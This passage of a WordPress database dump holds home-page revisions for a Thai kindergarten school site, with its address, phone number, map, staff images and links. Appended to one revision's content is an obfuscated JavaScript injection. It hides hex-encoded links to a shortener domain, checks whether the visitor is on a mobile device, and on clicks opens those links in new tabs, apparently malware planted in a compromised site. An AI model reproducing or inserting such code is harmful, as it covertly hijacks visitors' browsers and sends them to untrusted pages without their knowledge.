"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:58:03','2025-07-15 07:58:03','',19,'http://watprato.ssk.in.th/?p=693',0,'revision','',0),
(694,1,'2025-07-15 14:58:29','2025-07-15 07:58:29','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 